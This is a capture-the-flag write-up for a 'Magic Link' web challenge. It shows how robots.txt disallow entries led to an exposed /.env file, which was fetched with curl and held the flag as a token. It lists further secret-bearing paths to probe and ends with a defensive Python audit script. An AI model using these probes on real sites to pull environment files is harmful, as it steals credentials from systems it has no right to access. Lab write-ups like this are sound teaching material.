
Task: a Magic Link Login Service with hidden paths revealed in robots.txt. Solution: enumerate disallowed paths from robots.txt, access exposed /.env file to retrieve leaked credentials and flag.


Magic Link 1 — bluehens

Description

Magic Link Login Service at https://bluehens-magic-link.chals.io

A simple web application offering magic link authentication. The goal is to find the flag hidden somewhere in the application.

Analysis

Initial Recon

The main page (/) presented a simple Magic Link Login Service interface. Standard recon revealed a robots.txt file with interesting disallowed paths:

User-agent: *
Disallow: /inbox
Disallow: /dashboard
Disallow: /.env

The presence of /.env in the disallowed list is a major red flag — it suggests the environment file might be publicly accessible despite the robots.txt directive (which only instructs crawlers and enforces no access control at all).

The Vulnerability

The /.env file was directly accessible without authentication. This is a classic misconfiguration where sensitive configuration files are deployed to production and served by the web server.

Solution

  1. Check robots.txt for hidden paths:

    curl https://bluehens-magic-link.chals.io/robots.txt
  2. Access the exposed .env file:

    curl https://bluehens-magic-link.chals.io/.env
  3. Retrieved contents:

    [email protected]
    TEDDYS_TOKEN=udctf{d0n7_h057_y0ur_3nv_f113}
    [email protected]
    INBOX_URL=http://localhost:5050/inbox?token=${TEDDYS_TOKEN}

The flag was directly exposed as TEDDYS_TOKEN in the environment file.

Red Herrings

The /inbox and /dashboard paths mentioned in robots.txt were potential rabbit holes. Once the .env leak was discovered, there was no need to explore authentication bypass or inbox exploitation — the flag was already in hand.

Lessons Learned

  1. robots.txt is not access control — it's a suggestion for crawlers, not a security mechanism
  2. Always check for common sensitive files: /.env, /.git/config, /config.php, /wp-config.php.bak
  3. Environment files should never be in the web root — use proper deployment practices
  4. The flag itself is a hint: d0n7_h057_y0ur_3nv_f113 = "don't host your env file"
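A small post-deployment check that puts lessons 1 and 2 into practice, added here as an example and not part of the original writeup: it parses the Disallow entries of a robots.txt, flags the ones that look like sensitive files, and reports any that the server actually serves. The pattern list and the fake HTTP responder are assumptions; in real use pass a function that issues a HEAD request and returns the status code.

```python
import re
from typing import Callable

# Assumed patterns for files that should never be served from a web root,
# extended from the writeup's /.env, /.git/config, /config.php, /wp-config.php.bak.
SENSITIVE_PATTERNS = [
    re.compile(r"^/\.env(\.|$)"),
    re.compile(r"^/\.git(/|$)"),
    re.compile(r"^/(wp-)?config\.php(\.bak)?$"),
    re.compile(r"\.(bak|old|orig|swp)$"),
]

def disallowed_paths(robots_txt: str) -> list[str]:
    """Extract Disallow: entries from robots.txt, ignoring comments and blank rules."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                paths.append(path)
    return paths

def is_sensitive(path: str) -> bool:
    """True if the path matches one of the sensitive-file patterns above."""
    return any(p.search(path) for p in SENSITIVE_PATTERNS)

def audit_robots(robots_txt: str, status_of: Callable[[str], int]) -> dict[str, str]:
    """Classify each disallowed path: 'exposed' if a sensitive path is served (2xx),
    'blocked' if the server refuses it, 'listed' for entries that are not sensitive."""
    report = {}
    for path in disallowed_paths(robots_txt):
        if not is_sensitive(path):
            report[path] = "listed"
        elif 200 <= status_of(path) < 300:
            report[path] = "exposed"
        else:
            report[path] = "blocked"
    return report

# Constructed stand-in for an HTTP HEAD request, mirroring the challenge: /.env is served.
FAKE_RESPONSES = {"/inbox": 302, "/dashboard": 302, "/.env": 200}

def fake_status(path: str) -> int:
    return FAKE_RESPONSES.get(path, 404)

# The robots.txt from the writeup, embedded as a constant.
ROBOTS_TXT = "User-agent: *\nDisallow: /inbox\nDisallow: /dashboard\nDisallow: /.env\n"

if __name__ == "__main__":
    for path, verdict in audit_robots(ROBOTS_TXT, fake_status).items():
        print(f"{path:12} {verdict}")
```

Run against a staging host after every deploy; any "exposed" line means a file that should never have reached the web root is being served.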
